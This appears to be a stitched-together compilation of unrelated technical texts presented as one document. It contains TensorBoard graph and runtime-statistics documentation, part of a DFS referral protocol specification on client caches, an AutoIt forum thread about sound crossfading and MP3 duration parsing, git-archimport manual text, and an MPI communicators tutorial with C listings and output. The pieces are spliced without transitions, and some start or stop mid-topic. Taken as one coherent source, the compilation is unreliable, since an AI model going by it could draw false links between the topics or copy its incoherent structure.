Finally, you can choose two color schemes for your graph, using the color menu above the legend. The default Structure View shows structure: when two high-level nodes have the same structure, they appear in the same color of the rainbow. Uniquely structured nodes are gray. There's a second view, which shows what device the different operations run on. Name scopes are colored proportionally to the fraction of devices for the operations inside them. The images below give an illustration for a piece of a real-life graph. The images below show the CIFAR-10 model with tensor shape information:

Runtime statistics

Often it is useful to collect runtime metadata for a run, such as total memory usage, total compute time, and tensor shapes for nodes. The code example below is a snippet from the train and test section of a modification of the Estimators MNIST tutorial, in which we have recorded summaries and runtime statistics. See the Summaries Tutorial for details on how to record summaries. Full source is here.
```python
if i % 100 == 99:  # Record execution stats
  run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
  run_metadata = tf.RunMetadata()
  summary, _ = sess.run([merged, train_step],
                        feed_dict=feed_dict(True),
                        options=run_options,
                        run_metadata=run_metadata)
  train_writer.add_run_metadata(run_metadata, 'step%d' % i)
  train_writer.add_summary(summary, i)
  print('Adding run metadata for', i)
else:  # Record a summary
  summary, _ = sess.run([merged, train_step], feed_dict=feed_dict(True))
  train_writer.add_summary(summary, i)
```

This code will emit runtime statistics for every 100th step starting at step 99.
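Returning to the name-scope grouping described at the start: collapsing hidden/alpha, hidden/weights, and hidden/biases into a single hidden node amounts to bucketing op names by the prefix before the first slash. A rough sketch of that bookkeeping in plain Python (illustrative only -- this is not TensorBoard's actual implementation):

```python
from collections import defaultdict

def group_by_scope(op_names):
    """Group op names by their top-level name scope, the way the
    visualizer collapses 'hidden/*' into a single 'hidden' node."""
    groups = defaultdict(list)
    for name in op_names:
        scope, _, leaf = name.partition('/')
        if leaf:
            groups[scope].append(leaf)   # op lives inside a scope
        else:
            groups[name]                 # top-level op with no scope
    return dict(groups)

ops = ['hidden/alpha', 'hidden/weights', 'hidden/biases', 'init']
print(group_by_scope(ops))
```

Deeper hierarchies work the same way, applied recursively on each remaining suffix.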
3.1.1 Abstract Data Model This section describes a conceptual model of possible data organization that an implementation maintains to participate in this protocol. The organization is provided to explain how the protocol behaves. This document does not mandate that implementations adhere to this model as long as their external behavior is consistent with that described in this document. Because the DFS clients effectively block an application from accessing a specific file share until the DFS: Referral Protocol can map the DFS root name to an actual file server path, it is advantageous to cache DFS referral responses. Because of this, clients SHOULD maintain local caches of information received through referral requests to avoid future referral requests and to improve the performance of DFS resource access. BootstrapDC: Applicable only for a computer joined to a domain. This contains the name of a DC from which the DFS client will obtain a list of domain referral entries, in addition to a list of DC host names for a domain. DomainCache: Applicable only for a computer joined to a domain. This cache contains a list of trusted domains in both NetBIOS and fully qualified domain name forms, in addition to a list of DC host names for each domain. Conceptually, this is an array of tuples of the form <DomainName, DCHint, DCList>. Cache lookup involves finding a DomainCache entry with a matching DomainName. This can be used to check for a valid domain name or to find a DC host name for a given domain name. DCHint identifies a DC host name from DCList that should be the DC that was last successfully used by the DFS client. ReferralCache: This cache contains root, link, and sysvol referral responses. A hit on a ReferralCache entry indicates that the path in a name resolution operation is a DFS Root, DFS link, or a SYSVOL/NETLOGON share. A ReferralCache entry conceptually contains entries indexed by a DFS path prefix, DFSPathPrefix. 
An entry is a tuple of the form <DFSPathPrefix, RootOrLink, Interlink, TTL, TargetFailback, TargetHint, TargetList>. DFSPathPrefix is the DFS path that corresponds to a DFS root or a DFS link, and is the same as the string pointed to by the DFSPathOffset of a DFS_REFERRAL_V2, DFS_REFERRAL_V3 or DFS_REFERRAL_V4 referral entry. RootOrLink identifies whether the entry contains DFS root targets or DFS link targets. It reflects the value from the ServerType field of a referral entry (as specified in sections 2.2.5.1, 2.2.5.2, 2.2.5.3, and 2.2.5.4). Interlink identifies whether the entry contains a target in another DFS namespace, as determined by the test in section 3.1.5.4.5. TargetFailback is used only for DFS_REFERRAL_V4 and contains the value from the TargetFailback bit of the referral header (as specified in section 2.2.4). TTL contains a value derived from the TimeToLive field of a referral entry (as specified in sections 2.2.5.1, 2.2.5.2, 2.2.5.3, and 2.2.5.4). This is the time stamp at which a ReferralCache entry is considered to be expired. An implementation is free to come up with soft and hard time-outs based on the TimeToLive field of the referral entry, for example. The soft time-out can be used to initiate a ReferralCache entry refresh operation while permitting the use of the ReferralCache entry; the hard time-out limit can be used to fail any operation using the ReferralCache entry should all attempts to refresh it fail.<4> TargetHint identifies a target in TargetList that was last successfully used by the DFS client. TargetList consists of tuples of the form <TargetPath, TargetSetBoundary>, where TargetPath is the string pointed to by the NetworkAddressOffset field (as specified in sections 2.2.5.2, 2.2.5.3, and 2.2.5.4). TargetSetBoundary is only present in V4 referrals and reflects the value from the TargetSetBoundary of the referral entry (as specified in section 2.2.5.4).
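To make the shape of this model concrete, here is a sketch of a ReferralCache in Python. The field names mirror the conceptual tuple above; the longest-prefix-match lookup shown is one reasonable implementation choice, since the abstract data model does not mandate any particular organization:

```python
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

@dataclass
class ReferralEntry:
    # Mirrors the conceptual tuple <DFSPathPrefix, RootOrLink, Interlink,
    # TTL, TargetFailback, TargetHint, TargetList>.
    dfs_path_prefix: str
    root_or_link: str                 # "root" or "link"
    interlink: bool
    ttl: int                          # time stamp at which the entry expires
    target_failback: bool
    target_hint: int                  # index of last successfully used target
    target_list: List[Tuple[str, int]] = field(default_factory=list)

class ReferralCache:
    def __init__(self):
        self._entries = {}

    def add(self, entry: ReferralEntry) -> None:
        self._entries[entry.dfs_path_prefix.lower()] = entry

    def lookup(self, path: str) -> Optional[ReferralEntry]:
        """Return the entry whose DFSPathPrefix is the longest prefix
        of 'path', or None on a cache miss."""
        components = path.lower().split('\\')
        for n in range(len(components), 0, -1):
            prefix = '\\'.join(components[:n])
            if prefix in self._entries:
                return self._entries[prefix]
        return None
```

A hit tells the client that the path falls under a known DFS root, DFS link, or SYSVOL/NETLOGON share, so no new referral request is needed until the TTL expires.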
I have updated the first page with improvements. You can now set a sound to loop automatically by setting the 2nd parameter in _SoundPlay to 1

This is cool. Awesome. Thanks Dwalf

Edited by dwalf, 11 August 2006 - 10:13 AM.

Posted 11 August 2006 - 02:18 AM

Posted 23 May 2007 - 05:05 AM

Posted 23 April 2008 - 12:36 AM

#include "audio.au3"
;Kudos to RazeRM on his audio.au3 but i had to chop some of his soundseek in order for my trick to work

Func _SoundSeek2($sSnd_id, $iMs)
	;Declare variables
	;Local $iMs = 0
	Local $iRet
	;prepare mci to receive time in milliseconds
	mciSendString("set " & FileGetShortName($sSnd_id) & " time format milliseconds")
	;modify the $iHour, $iMin and $iSec parameters to be in milliseconds
	;and add to $iMs
	;$iMs += $iSec * 1000
	;$iMs += $iMin * 60 * 1000
	;$iMs += $iHour * 60 * 60 * 1000
	; seek sound to time ($iMs)
	$iRet = mciSendString("seek " & FileGetShortName($sSnd_id) & " to " & $iMs)
	;return
	If $iRet = 0 Then
		Return 1
	Else
		Return SetError(1, 0, 0)
	EndIf
EndFunc ;==>_SoundSeek

;$sID and $sID2 being the same sounds just 2 opened instances
;$lowpoint is the param of how low you want your sound to fade
;$time self explanatory in [ms] respectively
;CrossFade1 should be used when you want to loop the same tune with crossfading
Func CrossFade1($sID, $sID2, $time, $lowpoint = 20)
	For $i = 100 To $lowpoint Step -1
		Sleep($time / (100 - $lowpoint) / 2)
		_SoundSetMasterVolume($i)
	Next
	_SoundPlay($sID2)
	Sleep(500)
	_SoundStop($sID)
	_SoundSeek2($sID, _SoundPos($sID2, 2))
	_SoundPlay($sID)
	_SoundStop($sID2)
	For $i = $lowpoint To 100 Step 1
		Sleep($time / (100 - $lowpoint) / 2)
		_SoundSetMasterVolume($i)
	Next
EndFunc

;a bit of chopping
;/me gets binary axe :P
Func CrossFade2($sID, $sID2, $time, $lowpoint = 20)
	For $i = 100 To $lowpoint Step -1
		Sleep($time / (100 - $lowpoint) / 2)
		_SoundSetMasterVolume($i)
	Next
	_SoundPlay($sID2)
	Sleep(500)
	_SoundStop($sID)
	For $i = $lowpoint To 100 Step 1
		Sleep($time / (100 - $lowpoint) / 2)
		_SoundSetMasterVolume($i)
	Next
EndFunc

$sound = _SoundOpen("song.mp3", "music")
$sound2 = _SoundOpen("song2.mp3", "same_music")
_SoundPlay($sound)
Sleep(3000)
MsgBox(4096, "Test", "CrossFade sounds good?")
CrossFade1($sound, $sound2, 5000)
MsgBox(4096, "test", "what do you think? want to make it stop?")
_SoundStop($sound)
MsgBox(4096, "C2C", "I hope you make use of mine code if you can call it that :) Peace")

Posted 23 April 2008 - 07:48 PM

Posted 29 September 2008 - 09:16 PM

#NoTrayIcon
#include <Array.au3>
#include <File.au3>

$hDebugFile = FileOpen(@DesktopDir & "\SoundTest.txt", 2)
$sFile = FileOpenDialog("Open MP3 File", @MyDocumentsDir, "MP3 Files (*.mp3)")
If @error Then
	FileWrite($hDebugFile, "ERR: No File Opened" & @CRLF)
	Exit
EndIf
Local $szDrive, $szDir, $szFName, $szExt ;$szExt is ".mp3" anyway
_PathSplit($sFile, $szDrive, $szDir, $szFName, $szExt)
$Dir_Name = $szDrive & $szDir
$File_Name = $szFName & $szExt
$DOS_Dir = FileGetShortName($Dir_Name, 1)
$ShellApp = ObjCreate("shell.application")
If IsObj($ShellApp) Then
	$Dir = $ShellApp.NameSpace($DOS_Dir)
	If IsObj($Dir) Then
		$File = $Dir.Parsename($File_Name)
		If IsObj($File) Then
			$sRaw = $Dir.GetDetailsOf($File, -1)
			FileWrite($hDebugFile, "RAW--------------------------" & @CRLF & $sRaw & @CRLF & "END--------------------------" & @CRLF)
			$aInfo = StringRegExp($sRaw, "Duration: ([0-9]{2}:[0-9]{2}:[0-9]{2})", 3)
			If Not IsArray($aInfo) Then
				FileWrite($hDebugFile, "ERR: $aInfo Not Array")
				Exit
			EndIf
			FileWrite($hDebugFile, "$aInfo = [" & _ArrayToString($aInfo, ",") & "]" & @CRLF)
			$Track_Length = $aInfo[0]
			FileWrite($hDebugFile, "$Track_Length = '" & $Track_Length & "'" & @CRLF)
		EndIf
	EndIf
EndIf
FileClose($hDebugFile)
MsgBox(262144, "Done", "Thanks for testing.")

Posted 29 September 2008 - 09:47 PM

Posted 29 September 2008 - 10:35 PM

Edited by RazerM, 29 September 2008 - 10:38 PM.
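For reference, the regex-and-convert step in the test script above -- pulling "Duration: HH:MM:SS" out of the details string and turning it into milliseconds, as the commented-out lines in _SoundSeek2 suggest -- looks like this in Python (a sketch, not part of the UDF; note that matching the literal English "Duration:" label is exactly what fails on localized Windows, as the RAW dumps later in the thread show):

```python
import re

def duration_to_ms(details):
    """Extract 'Duration: HH:MM:SS' from a shell details string and
    convert it to whole milliseconds. Returns None when the English
    'Duration:' label is absent (e.g. on localized Windows)."""
    m = re.search(r'Duration: ([0-9]{2}):([0-9]{2}):([0-9]{2})', details)
    if m is None:
        return None
    hours, minutes, seconds = (int(g) for g in m.groups())
    return ((hours * 60 + minutes) * 60 + seconds) * 1000
```

The whole-second granularity here is also the source of the rounding error discussed further down the thread: the converted length is only accurate to the nearest 1000 ms.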
Posted 30 September 2008 - 12:50 AM

Windows 2000 w/ SP4: Tests from other Windows versions still needed, thanks.

Posted 30 September 2008 - 04:37 PM

Windows 2000 w/ SP4: SoundTest.txt is empty!

Edited by RazerM, 30 September 2008 - 04:38 PM.

Posted 30 September 2008 - 06:54 PM

That produced no output either! Try running in SciTE, and replace all "FileWrite($hDebugFile, " with "ConsoleWrite("

Posted 30 September 2008 - 07:20 PM

Edited by RazerM, 30 September 2008 - 07:22 PM.

Posted 30 September 2008 - 09:41 PM

Edited by RazerM, 01 October 2008 - 03:33 PM.

Posted 30 September 2008 - 09:51 PM

Sound.au3 (sort of) beta. I'm looking for people to test Variable Bit Rate (VBR) songs, which are now supported properly unless the Windows version doesn't support the shell.application object. If the object fails/isn't supported then the functions operate normally, albeit with possibly incorrect VBR length of sound file. (As old versions of Sound.au3 do.) I've added Melba23 to the authors, because the modifications were ultimately his, just modified to work within the functions rather than correcting my broken ones. I no longer need to know if the object works on different Windows versions; just the new code needs to be tested.

Edited by monoceres, 30 September 2008 - 09:53 PM.

Broken link? PM me and I'll send you the file!

Posted 30 September 2008 - 10:22 PM

Edited by RazerM, 30 September 2008 - 10:25 PM.

Posted 30 September 2008 - 10:42 PM

RAW--------------------------
Typ: VLC media file (.mp3)
Storlek: 3,84 MB
Artister: Linkin Park
Längd: 00:03:16
END--------------------------
ERR: $aInfo Not Array

Posted 30 September 2008 - 11:40 PM

Posted 01 October 2008 - 09:02 AM

Posted 01 October 2008 - 12:56 PM

Posted 01 October 2008 - 03:32 PM

RazerM, The beta works fine for me (Vista 32 SP1) - but then I would be surprised if it didn't!
RAW--------------------------
Type: MP3 File
Size: 6.41 MB
Artists: Glow
Length: 00:05:50
END--------------------------
ERR: $aInfo Not Array

The only thing I noticed in this rather longer testing phase was that multiple seeks within the file nearly always led to larger errors in the overall playing time - i.e. the file ended slightly early. This is no doubt because of the rounding to the nearest thousand ms that occurs when the file properties time is converted. Multiple seeks = multiple rounding errors = larger errors. But I cannot see any way of avoiding this, as it is inherent in the accuracy of the input data used. Besides, how often will you seek multiple times? And in the case of restarting long audio books or podcasts (which was the original question in the other thread if you remember!) a second or two is not really that important.

M23

PS I have added a post to the other thread concerning the origin of the "file properties" code snippet.

Just so you know, the "ERR: $aInfo not array" only happens in the test script; this bug is not present in sound.au3

Vista SP1 Ultimate:

RAW--------------------------
Type: MP3 Format Sound
Size: 3.34 MB
Artists: POPS
Length: 00:03:38
END--------------------------
ERR: $aInfo Not Array

Edited by RazerM, 02 October 2008 - 04:49 PM.

Posted 02 October 2008 - 04:48 PM

Edited by RazerM, 07 October 2008 - 09:03 PM.
git-archimport - Import an Arch repository into git Imports a project from one or more Arch repositories. It will follow branches and repositories within the namespaces defined by the <archive/branch> parameters supplied. If it cannot find the remote branch a merge comes from it will just import it as a regular commit. If it can find it, it will mark it as a merge whenever possible (see discussion below). The script expects you to provide the key roots where it can start the import from an initial import or tag type of Arch commit. It will follow and import new branches within the provided roots. It expects to be dealing with one project only. If it sees branches that have different roots, it will refuse to run. In that case, edit your <archive/branch> parameters to define clearly the scope of the import. git archimport uses tla extensively in the background to access the Arch repository. Make sure you have a recent version of tla available in the path. tla must know about the repositories you pass to git archimport. For the initial import, git archimport expects to find itself in an empty directory. To follow the development of a project that uses Arch, rerun git archimport with the same parameters as the initial import to perform incremental imports. While git archimport will try to create sensible branch names for the archives that it imports, it is also possible to specify git branch names manually. To do so, write a git branch name after each <archive/branch> parameter, separated by a colon. This way, you can shorten the Arch branch names and convert Arch jargon to git jargon, for example mapping a "PROJECT—devo—VERSION" branch to "master". Associating multiple Arch branches to one git branch is possible; the result will make the most sense only if no commits are made to the first branch, after the second branch is created. Still, this is useful to convert Arch repositories that had been rotated periodically. 
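As an illustration of the colon syntax (the archive and branch names below are invented, and a real run additionally needs the archive registered with tla and an empty working directory), the command line might look like this; it is echoed rather than executed here:

```shell
# Hypothetical archive name -- replace with one that tla knows about.
ARCHIVE='jane@example.com--2004'

# Map two rotated Arch branches onto the single git branch "master",
# and a devo branch onto "next" (multiple Arch branches may map to
# one git branch). Echoed instead of executed, since a real run needs
# a registered archive and an empty directory.
CMD="git archimport -v \
$ARCHIVE/project--release--1.0:master \
$ARCHIVE/project--release--1.1:master \
$ARCHIVE/project--devo--1.0:next"
echo "$CMD"
```

Without the `:gitbranch` suffixes, git archimport would derive branch names from the Arch branch names themselves.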
Patch merge data from Arch is used to mark merges in git as well. git does not care much about tracking patches, and only considers a merge when a branch incorporates all the commits since the point they forked. The end result is that git will have a good idea of how far branches have diverged. So the import process does lose some patch-trading metadata. Fortunately, when you try and merge branches imported from Arch, git will find a good merge base, and it has a good chance of identifying patches that have been traded out-of-sequence between the branches.
Remember that MPI groups and communicators provide a mechanism for parallel code modularity and offer communication contexts for groups of processes. The default communicator, MPI_COMM_WORLD, refers to all processes involved in the MPI computation and defines the default global context for message passing. Additional communicators — which provide a handle for a communications "channel" like on a CB radio — can be created and destroyed to suit the needs of a parallel code or a coupled model.

Communicators are significant because they provide a group scope for collective operations, such as broadcasts, gathers/scatters, and reductions. If these operations are relevant only on a subset of processes, communicators provide a communications channel for one or more process groups. Intracommunicators, which provide for point-to-point and collective communications within a group of processes, were introduced in Part 1. That discussion continues this month along with an introduction to intercommunicators, which provide point-to-point communication between two groups of processes.

As in previous columns, MPI routines and descriptions are based on the MPI-1.1 Standard. MPI-2 provides additional features, and some MPI-2 implementations are beginning to appear on clusters and supercomputers. The MPICH implementation (available online at mpi/mpich/index.html) is used for the examples below. Error checking is absent in the examples due to space limitations.

Partitioning Tasks Among Processes

In Part 1, we learned that multiple contexts (by having multiple communicators) provide a safe way to overlap communications and to overlap message tags. This sort of modularity is required when combining models or when implementing a parallel library, so that message passing within the library routines does not interfere with that performed in the user's code. This feature of communicators was demonstrated with a library call that performed a simple matrix transpose.
We've already seen two communicator constructors: MPI_Comm_dup(), which duplicates an existing communicator, and MPI_Comm_create(), which creates a new communicator from a process group definition. The third constructor, MPI_Comm_split(), partitions a group of processes associated with an existing communicator into non-overlapping subgroups.

While some parallel applications are designed to create new processes dynamically as needed to perform discrete parallel tasks, standard MPI codes typically initiate all processes at the beginning of a run. Then, at some point within the code, those processes are partitioned into subgroups that perform specific tasks or run certain submodels.

The MPI_Comm_split() routine provides a powerful mechanism for splitting up processes into subgroups based on a requested subgroup number or "color." The function (see its syntax in Table One) partitions the group associated with comm into disjoint subgroups, one for each value of color. Each subgroup contains all of the processes of the same color, and the processes are ranked in the order defined by the value of the key argument. Ties among processes with the same color and key arguments are broken according to their rank in the old group. The function automatically creates a new communicator for each subgroup.

Table One: MPI routines for manipulating communicators

ACCESSORS
int MPI_Comm_size(MPI_Comm comm, int *size)
int MPI_Comm_rank(MPI_Comm comm, int *rank)
int MPI_Comm_compare(MPI_Comm comm1, MPI_Comm comm2, int *result)

CONSTRUCTORS
int MPI_Comm_dup(MPI_Comm comm, MPI_Comm *newcomm)
int MPI_Comm_create(MPI_Comm comm, MPI_Group group, MPI_Comm *newcomm)
int MPI_Comm_split(MPI_Comm comm, int color, int key, MPI_Comm *newcomm)

DESTRUCTORS
int MPI_Comm_free(MPI_Comm *comm)

Listing One contains a C program, split.c, that demonstrates the use of the MPI_Comm_split() routine. As usual, the MPI header file (mpi.h) is included at the top.
Inside main(), MPI is initialized with MPI_Init(), and the rank, size, and processor name are obtained from calls to MPI_Comm_rank(), MPI_Comm_size(), and MPI_Get_processor_name(), respectively. Like previous examples, this information is printed to the display beginning with "Hello world!" Notice that this time, rank and size are 2-element arrays; that's because another value for process rank and communicator size will be obtained after the processes are partitioned.

Listing One: split.c demonstrates MPI_Comm_split()

#include <stdio.h>
#include "mpi.h"

int main(int argc, char **argv)
{
   int rank[2], size[2], namelen, color;
   char processor_name[MPI_MAX_PROCESSOR_NAME];
   char *cname[] = { "BLACK", "WHITE", "BLUE" };
   MPI_Comm comm_work;

   MPI_Init(&argc, &argv);
   MPI_Comm_rank(MPI_COMM_WORLD, &rank[0]);
   MPI_Comm_size(MPI_COMM_WORLD, &size[0]);
   MPI_Get_processor_name(processor_name, &namelen);
   printf("Hello world! I'm rank %d of %d on %s\n",
          rank[0], size[0], processor_name);

   color = rank[0] % 3;
   MPI_Comm_split(MPI_COMM_WORLD, color, rank[0], &comm_work);

   MPI_Comm_rank(comm_work, &rank[1]);
   MPI_Comm_size(comm_work, &size[1]);
   printf("%d: I'm rank %d of %d in the %s context\n",
          rank[0], rank[1], size[1], cname[color]);

   MPI_Comm_free(&comm_work);
   MPI_Finalize();
}

Next, a color value (which must be a non-negative integer) is set to the rank of the process in the global context modulo 3. As a result, three different color values are established and three groups are defined as long as at least three processes are available. The cname[] array contains the names for these three groups: BLACK, WHITE, and BLUE.

Now that each process has a color, the three new communicators can be easily and simultaneously created by calling MPI_Comm_split(). The first argument, MPI_COMM_WORLD, is the originating communicator. The color argument is 0, 1, or 2. The key value is rank[0], the rank of the process in the originating communicator. By using the original rank as the key, the rank order is preserved in the new context. Finally, the fourth argument, &comm_work, is a pointer to the new communicator on each process. This call actually generates three unique new communicators, one for each new context as shown in Figure One.

The new rank and size are obtained by calls to MPI_Comm_rank() and MPI_Comm_size(), using the new communicator comm_work. Each process then prints out its new rank, size, and color/context name.
At this point in a real model, the processes in each context would work collectively on some computation, and afterward may return to the global context to summarize results. At the end of the code, the new communicator is destroyed using MPI_Comm_free(), and MPI is shut down with MPI_Finalize().

The results of compiling and running split.c on eight processes are shown in Figure Two. As usual, the output is in no particular order. Notice that process zero becomes rank 0 in the BLACK context, one becomes rank 0 in the WHITE context, two becomes rank 0 in the BLUE context, and so on, as shown in Figure One.

Figure Two: Running split.c

[forrest@node01 comm]$ mpicc -O -o split split.c
[forrest@node01 comm]$ mpirun -np 8 split
Hello world! I'm rank 0 of 8 on node01
0: I'm rank 0 of 3 in the BLACK context
Hello world! I'm rank 6 of 8 on node07
6: I'm rank 2 of 3 in the BLACK context
Hello world! I'm rank 3 of 8 on node04
3: I'm rank 1 of 3 in the BLACK context
Hello world! I'm rank 4 of 8 on node05
4: I'm rank 1 of 3 in the WHITE context
Hello world! I'm rank 7 of 8 on node08
7: I'm rank 2 of 3 in the WHITE context
Hello world! I'm rank 2 of 8 on node03
2: I'm rank 0 of 2 in the BLUE context
Hello world! I'm rank 5 of 8 on node06
5: I'm rank 1 of 2 in the BLUE context
Hello world! I'm rank 1 of 8 on node02
1: I'm rank 0 of 3 in the WHITE context

For completeness, a table of all the MPI routines used to manipulate communicators (Table One) and a table of all the routines for manipulating groups (Table Two) are included here. All three communicator constructors have been demonstrated in examples. Only a couple of the group constructors were included in the examples, but it turns out that a wide variety of group constructors is available for defining process groups.
Table Two: MPI routines for manipulating groups

ACCESSORS
int MPI_Group_size(MPI_Group group, int *size)
int MPI_Group_rank(MPI_Group group, int *rank)
int MPI_Group_translate_ranks(MPI_Group group1, int n, int *ranks1, MPI_Group group2, int *ranks2)
int MPI_Group_compare(MPI_Group group1, MPI_Group group2, int *result)

CONSTRUCTORS
int MPI_Comm_group(MPI_Comm comm, MPI_Group *group)
int MPI_Group_union(MPI_Group group1, MPI_Group group2, MPI_Group *newgroup)
int MPI_Group_intersection(MPI_Group group1, MPI_Group group2, MPI_Group *newgroup)
int MPI_Group_difference(MPI_Group group1, MPI_Group group2, MPI_Group *newgroup)
int MPI_Group_incl(MPI_Group group, int n, int *ranks, MPI_Group *newgroup)
int MPI_Group_excl(MPI_Group group, int n, int *ranks, MPI_Group *newgroup)
int MPI_Group_range_incl(MPI_Group group, int n, int ranges[][3], MPI_Group *newgroup)
int MPI_Group_range_excl(MPI_Group group, int n, int ranges[][3], MPI_Group *newgroup)

DESTRUCTORS
int MPI_Group_free(MPI_Group *group)

Using Intercommunicators to Pass Messages Between Groups

Up to now, all the communicators discussed have been intracommunicators. These are used to communicate within a group of processes. Another type of communicator, called an intercommunicator, makes it possible to communicate between two groups of processes. Intercommunicators can be used for all point-to-point communications (MPI_Send(), MPI_Recv(), etc.), but may not be used to perform collective operations. This limitation goes away in MPI-2, but for those using MPI-1, these collective operations can be implemented by the programmer using combinations of MPI-1 routines.

An intercommunicator is created by a collective call, MPI_Intercomm_create(), executed in the two groups to be connected.
Arguments to this call (see Table Three) are the local intracommunicator, the local process leader (i.e., the rank of a process in the local context), a peer or parent communicator, the rank of the remote group's leader in the peer/parent communicator context, a "safe" message tag to be used for communications between the process leaders, and a pointer to the new intercommunicator.

Table Three: MPI routines for manipulating intercommunicators

ACCESSORS
int MPI_Comm_test_inter(MPI_Comm comm, int *flag)
int MPI_Comm_remote_size(MPI_Comm comm, int *size)
int MPI_Comm_remote_group(MPI_Comm comm, MPI_Group *group)

CONSTRUCTORS
int MPI_Intercomm_create(MPI_Comm local_comm, int local_leader, MPI_Comm peer_comm, int remote_leader, int tag, MPI_Comm *newintercomm)

OPERATIONS
int MPI_Intercomm_merge(MPI_Comm intercomm, int high, MPI_Comm *newintracomm)

DESTRUCTORS
int MPI_Comm_free(MPI_Comm *comm)

Both groups must select the same peer communicator, and the peer communicator must contain all the members of the two groups for which the intercommunicator is being created. Although the rank of the process leader in each group does not matter, all participants in the operation must nominate the same process. Intercommunicators can be destroyed using the same call used to destroy intracommunicators: MPI_Comm_free().

Listing Two contains a modified version of the split.c code, called split-inter.c, that performs a point-to-point communication within the local group (after the processes are partitioned with MPI_Comm_split()) and then links the BLACK and WHITE contexts with an intercommunicator. This intercommunicator is then used to pass a value from each of the BLACK group members to the WHITE group members with the corresponding local ranks. These operations are illustrated in Figure Three.
Listing Two: split-inter.c

#include <stdio.h>
#include "mpi.h"

int main(int argc, char **argv)
{
  int rank[2], size[2], namelen, color;
  char processor_name[MPI_MAX_PROCESSOR_NAME];
  char *cname[] = { "BLACK", "WHITE", "BLUE" };
  int i, buf, val;
  MPI_Comm comm_work, intercomm;
  MPI_Status status;

  /* Say hello in the global context, then split MPI_COMM_WORLD into
   * the BLACK/WHITE/BLUE contexts by color = rank % 3, as in split.c */
  MPI_Init(&argc, &argv);
  MPI_Comm_rank(MPI_COMM_WORLD, &rank[0]);
  MPI_Comm_size(MPI_COMM_WORLD, &size[0]);
  MPI_Get_processor_name(processor_name, &namelen);
  printf("Hello world! I'm rank %d of %d on %s\n", rank[0], size[0], processor_name);

  color = rank[0] % 3;
  MPI_Comm_split(MPI_COMM_WORLD, color, rank[0], &comm_work);
  MPI_Comm_rank(comm_work, &rank[1]);
  MPI_Comm_size(comm_work, &size[1]);
  printf("%d: I'm rank %d of %d in the %s context\n", rank[0], rank[1], size[1], cname[color]);

  val = rank[1];
  if (rank[1]) {
    /* Have every local worker send its value to its local leader */
    MPI_Send(&val, 1, MPI_INT, 0, 0, comm_work);
  } else {
    /* Every local leader receives values from its workers */
    for (i = 1; i < size[1]; i++) {
      MPI_Recv(&buf, 1, MPI_INT, i, 0, comm_work, &status);
      val += buf;
    }
    printf("%d: Local %s leader sum = %d\n", rank[0], cname[color], val);
  }

  /* Establish an intercommunicator for message passing
   * between the BLACK and WHITE groups */
  if (color < 2) {
    if (color == 0) {
      /* BLACK group: create intercommunicator and send to
       * corresponding member in WHITE group */
      MPI_Intercomm_create(comm_work, 0, MPI_COMM_WORLD, 1, 99, &intercomm);
      MPI_Send(&val, 1, MPI_INT, rank[1], 0, intercomm);
      printf("%d: %s member; sent value = %d\n", rank[0], cname[color], val);
    } else {
      /* WHITE group: create intercommunicator and receive
       * from corresponding member in BLACK group */
      MPI_Intercomm_create(comm_work, 0, MPI_COMM_WORLD, 0, 99, &intercomm);
      MPI_Recv(&buf, 1, MPI_INT, rank[1], 0, intercomm, &status);
      printf("%d: %s member; received value = %d\n", rank[0], cname[color], buf);
    }
    MPI_Comm_free(&intercomm);
  }

  MPI_Comm_free(&comm_work);
  MPI_Finalize();
  return 0;
}

The first part of the code is the same as in split.c, but after the new rank, size, and color are printed, each process sets val to the value of its (local) rank in the new context. If that rank is not zero, the process sends this value to the process of rank 0 in the local context, using MPI_Send(). Correspondingly, the processes of rank 0 in the local context loop over each process in the local group, receiving the sent values using MPI_Recv().
The rank zero processes accumulate these values into val, and then print them. Next, an intercommunicator is established between the BLACK context and the WHITE context. Only processes with a value of color less than 2 execute this block of code, because processes in the BLUE context are not involved in establishing this intercommunicator. The BLACK and WHITE groups establish the intercommunicator by calling MPI_Intercomm_create() with consistent arguments. The first argument is the local communicator, called comm_work in both contexts. The second argument is the local process leader; all processes nominate the local process of rank 0 as leader. The peer intracommunicator in the third argument is the one to which all affected processes belong. Here MPI_COMM_WORLD is used. The fourth argument is the rank of the remote leader in the context of the peer intracommunicator. For the BLACK group, the remote leader is process zero in the WHITE context, which is process one in MPI_COMM_WORLD. For the WHITE group, the remote leader is process zero in the BLACK context, which is process zero in MPI_COMM_WORLD. A tag value of 99 is provided as the fifth argument. This value of tag must be the same in both calls to MPI_Intercomm_create(). It should represent a "safe" tag for communications between the two process leaders in the MPI_COMM_WORLD context; therefore, this tag should not be used anywhere else in the code. Finally, a pointer to the new intercommunicator (&intercomm) is supplied as the sixth argument.

Once the intercommunicator has been established, the processes in the BLACK group send the contents of val to the processes with the corresponding rank in the WHITE context. This is accomplished by calling MPI_Send() using the local rank (rank[1]) as the destination and the new intercommunicator (intercomm) as the communicator. Likewise, members of the WHITE group call MPI_Recv(), using the local rank as the source along with the new intercommunicator just created.
After the point-to-point communication completes, processes in both groups report the values sent or received. Then the intercommunicator is destroyed using MPI_Comm_free(), the intracommunicator comm_work is freed, and MPI is finalized using MPI_Finalize(). Figure Four shows the results of compiling and running split-inter on eight processes. As with split.c, each process prints a "Hello world!" message followed by the rank and size of the global context along with the processor hostname. When the new intracommunicator is created, each process prints the rank, size, and color of the new context.

Figure Four: The output of split-inter.c

[forrest@node01 comm]$ mpicc -O -o split-inter split-inter.c
[forrest@node01 comm]$ mpirun -np 8 split-inter
Hello world! I'm rank 0 of 8 on node01
0: I'm rank 0 of 3 in the BLACK context
0: Local BLACK leader sum = 3
0: BLACK member; sent value = 3
Hello world! I'm rank 6 of 8 on node07
6: I'm rank 2 of 3 in the BLACK context
6: BLACK member; sent value = 2
Hello world! I'm rank 2 of 8 on node03
2: I'm rank 0 of 2 in the BLUE context
2: Local BLUE leader sum = 1
Hello world! I'm rank 1 of 8 on node02
1: I'm rank 0 of 3 in the WHITE context
1: Local WHITE leader sum = 3
1: WHITE member; received value = 3
Hello world! I'm rank 4 of 8 on node05
4: I'm rank 1 of 3 in the WHITE context
4: WHITE member; received value = 1
Hello world! I'm rank 7 of 8 on node08
7: I'm rank 2 of 3 in the WHITE context
7: WHITE member; received value = 2
Hello world! I'm rank 5 of 8 on node06
5: I'm rank 1 of 2 in the BLUE context
Hello world! I'm rank 3 of 8 on node04
3: I'm rank 1 of 3 in the BLACK context
3: BLACK member; sent value = 1

